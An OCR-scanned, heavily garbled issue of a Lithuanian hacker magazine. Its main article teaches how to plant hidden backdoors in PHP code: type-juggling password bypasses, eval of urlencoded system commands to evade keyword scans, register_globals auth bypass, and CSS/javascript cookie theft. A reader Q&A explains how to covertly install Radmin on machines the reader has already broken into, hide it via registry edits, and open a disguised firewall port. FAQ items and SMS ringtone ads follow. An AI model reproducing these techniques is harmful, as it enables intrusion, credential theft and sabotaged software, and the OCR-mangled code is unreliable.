dalykėlių, kaip „include“ ir „system“ :). Aš manau, kad geriausia 
į programos kodą įrašyti ne buką system($ GET[cmd]), o kokią 
nors sunkiai suprantamą loginę klaidą, kurios automatinėmis 
priemonėmis niekaip nesurastum. Apie tai mes taip pat 
pakalbėsime, tačiau iš pradžių aptarkime kiek kitokias idėjas. 


[Sulyginimo klaidos] Daugelyje skriptų yra vietu, kur atliekama 
vartotojų autentifikacija. Bendru atveju tai daroma maždaug taip. 
Iš lentelės išrenkamas vartotojo įvestą vardą atitinkantis įrašas, 
po ko patikrinama, ar įrašas grąžintas, bei sulyginamas įvestas ir 
originalus slaptažodis arba slaptažodžių hešai. Tikriausiai tu dabar 
pagalvojai, kad aš tau papasakosiu apie są/-injection. Deja, ne. 
Pirmojo mūsų triuko esmė slypi sulyginimo operatoriaus [==) 
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SCENA HACK IMPLANT SOFTWARE FERRUM 


UNIXOID 


CODING 


UNITS 


panaudojime. Sakyk, ar esi tikras, kad žinai, kaip jis veikia? Pa- 
bandykime tave patikrinti. Kaip reikiant pagalvok ir pasakyk, ką 
gražins šis kodas: 


(0 "0a1") Įretun 1:) else (retum 0;) 


Daugelis žmonių mano, kad jis grąžins O, kadangi nulis nėra lygus 
eilutei „aa1“. O kodas grąžins vienetuką. Operatoriaus == požiūriu, 
Skaičius O „lygus“ eilutei „aa1“. Visa esmė čia tame, kad PHP kaip 
kalba be aiškiai išreikšto duomenų tipizavimo, programuotojams 
suteikia didelę laisvę, tačiau tuo pačiu sukelia tam tikrų problemų. 
Taigi su == operatoriumi sulyginus sveiką skaičių ir eilutę, eilutė 
bus transformuota į int tipą (type casting tipų pakeitimas) ir 
visada bus „lygi“ nuliui. Šią savybę galima panaudoti siekiant į savo 
sistemą įdiegti slaptą įėjimą, ką galima įgyvendinti štai taip: 


ilereg(“  [0-9]S“,5 GEl[passwd)) Spassud= (ini)S GET[passvd]; 

else Spassud=—S GE [passwd]; 

(S GET(login] — = "user: name" 88 Sposswd 
acho "hello", 


"Tes8)jiy67") ( 


Šiame pavyzdyje paprasčiausiai sulyginami kintamieji ir griežtai 
apibrėžtos reikšmės. Tačiau toks kodas išganingąjį „hello“ išves 
dviem atvejais: jeigu lauke passwd bus slaptažodis (T9s8)jdy67) 
arba... skaičius O. 

Beje, bugtrag forumuose neseniai buvo pasirodę pranešimai apie 
panašią klaidą. Savaime suprantama, ji buvo aptikta phpBB forume 
(jeigu tik aš netyčia ko nors nepainioju). 


[Pokštai su „eval“] Neblogas būdas kodo viduje paslėpti 
bekdorą — pasinaudoti funkcija eval. Tu tikriausiai žinai, jog ši 
funkcija užsiima tuo, kad įvykdo jai perduotą php kodą. Kodas 
perduodamas paprasčiausios eilutės pavidalu, pavyzdžiui, štai 
taip: 


aal('echo '0k;*); 


Šiuo atveju bus išvesta eilutė 'ok'. Mūsų atveju slaptosios kodo 
eilutės negalima įterpti atviru pavidalu. Juk daugelis dideles siste- 
mas tiriančių ir jose klaidų ieškančių įsilaužėlių programos tekste 


Išifravimas ir PHP] 

Tau veikiausiai iškilo klausimas, kaip galima šifruotis su 
RSA. Iš tiesų, šifravimo ir PHP temos mes dar praktiškai 
neaptarinėjome. Norint pasinaudoti tokiais algoritmais, kaip 
DES, TripleDES, Blowfish, 3-WAY, SAFER-SK64, SAFER- 
SK128, TWOFISH, TEA, RC2 ir tt., reikia įdiegti biblioteką 
libmerypt-2.5.6. Ją tu gali rasti arba mūsų diske, arba 
parsisiųsti iš interneto, adresu mcrypt.sourceforge.net. Po to, 
kai tu išpakuosi archyvą su biblioteka, tau reikia ją sukom- 
piliuoti su parametru --disable-posix-threads, po ko taip pat 
reikės iš naujo sukompiliuoti PHP configure skriptui papildomai 
sušeriant parametrą --wit =DIRj. 

Įdiegęs biblioteką tu galėsi naudotis daugybe funkcijų, kurių 
aprašymą rasi mūsų diske. Internete apie tai paskaityti gali 
www.php.net svetainėje — čia tau pakaks: pagrindiniame 
puslapyje esančiame paieškos laukelyje įvesti žodelį merypt. 


paprasčiausiai ieško raktinių žodžių potencialiai pavojingų 
funkcijų (system(), exec(), include!) ir t.t.) iškvietimų. Dėl to mes 
pasinaudosime savo pranašumu ir nuodingąjį kodą transformu- 
osime į URL atvaizdavimą, kuomet kiekvienas simbolis atitinkamai 
atvaizduojamas ?6šešioliktainis simbolio kodas pavidalu. Tokia 
eilutės kodavimo procedūrą labai paprasta suprasti: 


Šstr "system(s -l0');“; 

Tor(Si =0;Si < sirlen[SstiJSi + +) ( 
Stode= ord(Sst[$i]); 
Shexcode = dechex(Šcode); 
echo 96".Shexode; 


! 
Eilutei system('Is -la'); bus gauta tokia baitų seka: 
V739079947394748665*66dY0280627006c04739420042d966CYL6194270629*h3b 


Dabar, jeigu mes jai perduotume valdymą, prieš tai ją apdoroję su 
funkcija urlencode, būtų nepastebimai įvykdoma mūsų hakeriška 
komanda: 


oval(urkdecoda(“94739679067306740465066d9528062706606730620062d066c66 1 06270) 
290485"); 


[Gamtai nepaprieštarausi] Kiečiausia, ką galima sugalvoti darant 
klaidas — tai padaryti loginę klaidą, t.y. sąmoningai suregzti tokią 
ifų, case'ų, ciklų ir išorinių funkcijų iškvietimų mišrainę, kad esant 
tam tikroms sąlygoms ši konstrukcija suveiktų tavo labui. Surasti 
tokį dalyką tarp tūkstančio kodo eilučių — tiesiog neimanoma, ir 
čia nepadės net automatizacija :). Tuo mes su tavimi ir pasinau- 
dosime. Įsivaizduok tokį kodo fragmentą: 


funcion islagin(Šlogin) Į 
iilereg(Slogin, * > [0-24-209](8,103S7)) (return Ie;) 
elė (retum false:)- 


) 


tundion, isPasswd(Spassvd) 
ireg(Spasswd, "> [0-2A70-9](820)S")) (return ine;) 
else: (retum false;)- 

1 


luncion aulh(Šlogin, Spassud) ( 

Šl=-2; 
ššįsLogin(Šlgin)) SI + + 
iisPasswd(Sposswd)) ŠIL+ 
ifisser($1)) SI=Sl; 
6l==0 

return ru; 
Į ele į 

return. false; 


) 


ja 


Funkcijos isLogin ir isPasswd įkurdintos atskiroje byloje, auth() — taip 
pat. Viskas iškviečiama išorinėje byloje. Sakyk, kaip tokiu atveju 
galima apeiti autentifikaciją? 

Elementariai! Jeigu skripte aktyvuotas parametras register 


globals=On, skriptui pakanka per- 
duoti parametrą |=0. Tokiu atveju į 
kintamąjį $I bus įkelta tavo reikšmė, 
o visi patikrinimai nueis šuniui ant 
uodegos. 


[CSS ir sesijos] Štai kur tikra erdvė 
veistis vabaliukams ir klaidelėms! 
Dabar tapo madinga sesijas susieti 
su IP adresais, iš kurių jos buvo in- 
icijuotos. Laikai, kuomet nugvelbus 
sesijos ID buvo galima gauti priėjimą 
prie ten paslėptų kito IP adreso 
parametrų, lygiai kaip ir vartotojų 
vardų bei slaptažodžių saugojimas 
sausainukuose atviru tekstu, jau 


programuotojo neapsižiūrėjimas 
ar specialiai padaryta klada? 


seniai praėjo :). 

Visų pirma reikia esant tam tikroms sąlygoms leisti vartotojui įterpti 
CSS kodą. Savaime suprantama, prie bet kokių kitų sąlygų sis- 
tema turėtų atmesti visą likusį kenksmingą mėšlą. Čia tu pripratai 
naudotis ereg funkcijomis, kurios iš vartotojiškų eilučių iškerpa 
nereikalingus simbolius. Daugelyje projektų vartotojams kuriami 
specialūs bb tagai, tokie, kaip [img] ir [b], kurie leidžia elemen- 
tariai formatuoti pranešimus. Šiuo atveju galima padaryti mažytę 
klaidelę ir leisti vartotojui vietoje vieno bb tago parametrų įterpti 
štai tokią konstrukciją: 


sto backjound-imageurjovascipkolen("YSS") 


Tai leis realizuoti CSS ataką. Tačiau ką su ja mes galėsime gauti? 
Kaip įprasta, sausainukų turinį. Štai kur visa esmė. Sausainukuose 
reikia paslėpti ką nors labai svarbaus, pavyzdžiui, su RSA užšifruotus 
vartotojų vardų ir slaptažodžių derinius. Šifruotą seką įkelsime į 
sausainuką, ir prie šios informacijos neprieis niekas, išskyrus mus. 
Net jeigu koks nors kietas hakeris ir gaus vartotojo sausainuką 
bei supras, kad keistame PHPSID kintamajame saugoma ne kas 
kita, kaip užšifruota U+p pora, jis prie šios informacijos negalės 
prieiti net ir turėdamas priėjimą prie atviro rakto, su kuriuo mes 
Užkodavome vartotojo prisijungimo duomenis. 


bibliotekos merypt funkcijų aprašymas 


Kas tai yra podkastas? 


(O) 


Livejournal.com ir kiti on-line dienoraščiai tinklo 
visuomenės jau nebejaudina taip, kaip prieš keletą metų. 
Paprasčiausiai prie jų visi jau priprato. Naujas būdas 
internete padžiauti savo apatinius — tai taip vadinami 
audio-blogai. Nuo šiol tau rūpimas mintis tu gali išreikšti ne 
rašytine forma, o balsu. Tai kažkas panašaus į on: line radiją, 
tik kiek kitu, periodiniu formatu. Taigi dienoraštis, kuriame 


pateikiami balso pranešimai, vadinasi podkastu. Pats šis žodis 
kilo iš iPod grotuvo pavadinimo ir angliško žodžio broadcasting 
(transliavimas). Specialiai sudarius RSS formą, podkastą gali- 
ma perklausyti ir su minėtuoju grotuvu. Audio-blogai saugomi 
specialiuose resursuose — podcast terminaluose. 
(O) Kas tai yra HDTV ir IPTV? 
HDTV (angl. High Definition TeleVision, didelės raiškos 
0) televizija) — plačiaekranė televizija, naudojanti 
skaitmeninį garsą ir išsiskirianti didele raiška. HDTV 
raiška, lyginant su standartine televizija, yra daug 
didesnė. Jeigu įprastinės televizijos raiška yra 720x480 
NTSC sistemoje ir 720576 PAL sistemoje, tai HDTV atveju 
ji siekia 1920x1080 (1080i) ir 1280x720 (720p). Raidė 
i reiškia, kad vaizdas perduodamas 50 arba 60 puskadrių 
per sekundę greičiu (Interlaced). Šis režimas leidžia vaizdo 
perdavimo metu sumažinti duomenų srautą, tačiau pablogina 
dinaminių scenų vaizdo kokybę. Indeksas parodo, kad vaizdas 
bus apdorojamas 24, 25, 30, 60 pilnų kadrų per sekundę 
greičiu (Progressive Scan). Toks vaizdas atrodo natūraliau, 
tačiau padidina duomenų srauto apimtį. HDTV neturi 4:3 
formato vaizdo perdavimo standarto ir pripažįsta tik 16:9. 
Dar vienas svarbus privalumas: galimi skirtingi skaitmeniniai 
formatai įskaitant ir Dolby Digital 5.1. 
IPTV (Internet Protocol Television, televizija per internetą) — 
skaitmeninės televizijos technologija, kuomet vaizdas abonen- 
tui pateikiamas IP protokolu per plačiajuostį prisijungimą. 


No 


PRIEŠ UŽDUODAMAS KLAUSIMĄ 

PAGALVOK! MAN NEVERTA SIŲSTI 

KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIR- 
TAS „HACK-FAG“, TAIP PAT NEV- 
ERTA UŽDAVINĖTI AKIVAIZDŽIAI 
LAMERIŠKŲ KLAUSIMŲ, ATSAKY- 

MUS Į KURIUOS TURĖDAMAS BENT 
KIEK NORĖDAMAS GALI RASTI IR 
PATS. AŠ NE TELEPATAS, TODĖL 

KONKRETIZUOK KLAUSIMĄ IR 
ATSIŲSK KUO DAUGIAU INFORMA- 
CIJOS. 


matau Google reklamą. Ar iš 
to tikrai galima užsidirbti? 


Pagrindines pajamas Google kompanijai atneša būtent 
reklama. Sistemos mechanizmas susideda iš dviejų 
pagrindinių tiesiogiai viena su kita susijusių technologijų: 


AdWords skirta besireklamuojantiems, o AdSense 
svetainių savininkams. Norintys reklamuotis kreipiasi į 


AdWords su prašymu pakabinti reklamą, kuriame aprašo savo 
tikslinę auditoriją. Mokama už lankytojų paspaudimus ant 
reklamos: atėjo lankytojas — mokėk. Savo ruožtu reklaminiai 
skelbimai kabinami AdSense sistemoje užsiregistravusiose 
svetainėse. Čia esmė tame, kad Google AdSense svetainėje 
atvaizduoja tik tuos tekstinius ir grafinius skelbimus, kurie tinka 
pagal svetainės tematika. Aišku, su Google galia ir apgalvo- 
tais algoritmais išanalizuoti svetainės turinį tikrai nesunku. 
Webmasteriams taip pat mokama už kiekviena paspaudimą 
arba tūkstantį paspaudimų. Mokestis priklauso nuo daugybės 
faktorių ir varijuoja nuo 3 iki 150 centų už paspaudimą, o čekis 
išsiunčiamas pasiekus 100 dolerių sumą. Iš anksto nustatyti 
apmokėjimo sumos neimanoma -— tam reikia užsiregistruoti 
sistemoje. Kaip sakoma, imk ir patikrink, o tada daryk išvadas. 
Bet kokiu atveju, tu nieko neprarasi ir. dar daugiau, gausi 
galimybę būti pastebėtas tiesioginių reklamos užsakovų. www. 
webmasterworld.com/forum89/13028.htm puslapyje pateik- 
tas puikus naujokams skirtas straipsnis, kuriame pateikiami 
Išsamūs komentarai ir konkretūs skaičiai. Reziumuojant galiu 
pasakyti: Iš to tikrai galima užsidirbti. 


|=- 


Kaip reikiant pasistengiau ir Ilokaliame tinkle 
nulaužiau dešimtį mašinų. Vis dėlto priėjimas prie 
komandinės eilutės — tai ne svajonių riba. Kaip 
aš galėčiau jose nepastebimai įdiegti Radmin 
serverį? 


Tiesa, Radmin pagal nutylėjima įdiegiamas naudojan- 
tis grafine aplinka su specialiu vedliu. Taigi teks imtis 
gudrybės ir pasinaudoti jau įdiegto paketo bylomis. 
Mums prireiks šių bylų: r server.exe, AdmDIl.dll, rad- 
dndll. Jas reikia perkelti į nutolusį serverį (pavyzdžiui, su 
Ap). Kai bylos bus užkrėstoje sistemoje, tau tereikia įvykdyti 
keletą komandų. Visų pirma, reikia atlikti paslėptą įdiegimą 
(su raktais /install /silence): 


(0) 
0) 


I semvevexe /install /silence 


Tada per tam tikrą jungti paleisti patį servisą ir apsaugoti 
serverį slaptažodžiu: 
T servaiaxe /port:portas /poss:slaptažodis /save /silence 


Išdavikišką Radmin ikonėlę sisteminiame lauke (tray) galima 
pašalinti per sisteminį registrą: 


CM0--REG ADD HKLMASYSTEMNRAdminty2.OMServer Parameteis /V Disableliaylcon 
/4 REG BINARY /d 00000001 /l 

CMD->REG ADD HKLMANSYSTEMMurrentContralSelNSemvicesV. servai Av DisplayName 
A REG S2 /d „Semvice Host Contolle“ A 


Jeigu nutolusioje sistemoje įdiegta ugniasienė, tai pirmasis 
prisijungimas greičiausiai baigsis nesėkme. Ugniasienę rei- 
kia neutralizuoti, t.y. iš viso išjungti arba į jos konfigą pridėti 
taisyklę, leidžiančią jungtis prie Radmin serverio. Standartinės 
Windows ugniasienės atveju tokią taisyklę galima pridėti per 
komandinę eilutę: netsh firewall add portopening TCP ra: 
min portas radmin. Paskutinis raktas — taisyklės pava 
mas, todėl jį galima pakeisti į ką nors mažiau pastebimo, kas 
ne taip kristų į akis. 
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Naudojiesi internetu 
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Kiek žurnalo numerių skaitei? 
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8) POLI melodija - rašyk SMS: MA SUPER kodas 
pVz.: HASUPER53465 | Siųsk numeriu: 
AB. Siųsk draugui: HA SUPER kodas 3706XX00XXX 


m] Mono melodija: HAM kodas 2Lt 


OTIPĄ | Kūno masės Indeksas: 


E AU nio i 
j 18376 
) Seinais 14 
- Sužinok savo 
ino masės 
iyk žinutę: MA L TI 
TO Indeksai 
tavo telefone nustatyt MAP pameni Ask 
donani T2A0T300,1310 6106 
i AIESi TELE Gikyn iuo «| 50465 


GPaSwASS, 


vu: 1382 a“ 


Spl pavikkki aka: Nokia vs naujoms medejams Moteroa: (650 V1E0, 220 VO VO, V525 V*sO)VEDO Sa 
10. Xas0, X100 2100 5 


510 
ŠanyEresso: KSI) KO, 750, 80, 2500 PS00, 310, 700, 
lelonime M k Nokia 


Laimė šali 


Rašyk SMS: 
į“ Mes vyrai 


HA SUPER kodas 
pvz.: HA SUPER 209482 
Šiųsk numeri 


M 1.Aašykšinuts HAWALL 34968 | 2.5Susti numeriu: 1352 
2, Meino: MAMIALLJA568 370600K0X 214 


Gėlių kvartale 
Kartais būna 


Nesek sau rožių 
Okam sava 


UE ET 


489 


206278 
214389 
ia 216334 
187162 
188097 
209482 


DA VINCI 
PAVI 


IKSLIUKAI 


Rašyk žinutę: HA WALL 39749 


numeriu: 1352 
LL 30616 370600 


35760 


r 


JAVA ŽAIDIMAS 
Hi DA VINCI CODE 
THE OUEST BEGINS 
Rašyk žinutę: 

MA JAVA 216316 

Siųsk numeriu: 1354 


1. Rašyk žnutę 
HAPOZAIrnųmerį nuo 1 iki 100 
Pvz MAPOZASS 

2 Siųsk numerus 1352. 


Atsisiųsk žaidimą: 


A iyk inutę MA JAVA kodas: 
pi: MA JAVA CMROS 
Pumeru: 1354. 


Ši 104t 
MA KHOR tavo gimimo diena, mėnuo Ir metai 
Pvz: MA RHORO3-04.1980 

2. Sis numeri: 1252 


7. Samers: Ct, (62 C62, NSS, MC, 55,55, Ta, 53 Venon 2 060.SH1 Sony 


Tlo0,Va00, 100. Siemen A60 


V6š,Ol65,CX30,MS5 Mūs MC64,S5 
210, 7610. 630 VaGO 


289, Ploni medijos Ina: Lokės sl aujems eefonams Sam D 


bitų 


Xx 


Atsisiųsk šį paveiksliuką, 
įsavotelefoną, rašyk SMS: 
MA WALL 30608 


irsiųsk numeriu: 1352 244 


World Championship Edition 2006 

Rašyk SMS: HA JAVA 218967 
Aeaimėni 1884 

ana 


Pakvaišusi karvė 
Šexy šviipavimas 
Morzės kodas 
Fakinę Piek I Up 
WaazzZZaaAP!|! 
ABFutbolo daina - Olė ole olė! 
Kačiukas miauksi 
Iš filmo „Seksas ir miestas“ 
Paukššiūjai čiulba 


M] Rašyk SMS: HATR kodas ID 
pYz.: ATR 73488 
ži numeriu: KES) 


so 500 K700 P800 P300 P91 
710, ET 1, 3004 


O. Mina mesio aka: oi os jom 


so KT63, PSO, 2911 5700. PAD 2600 


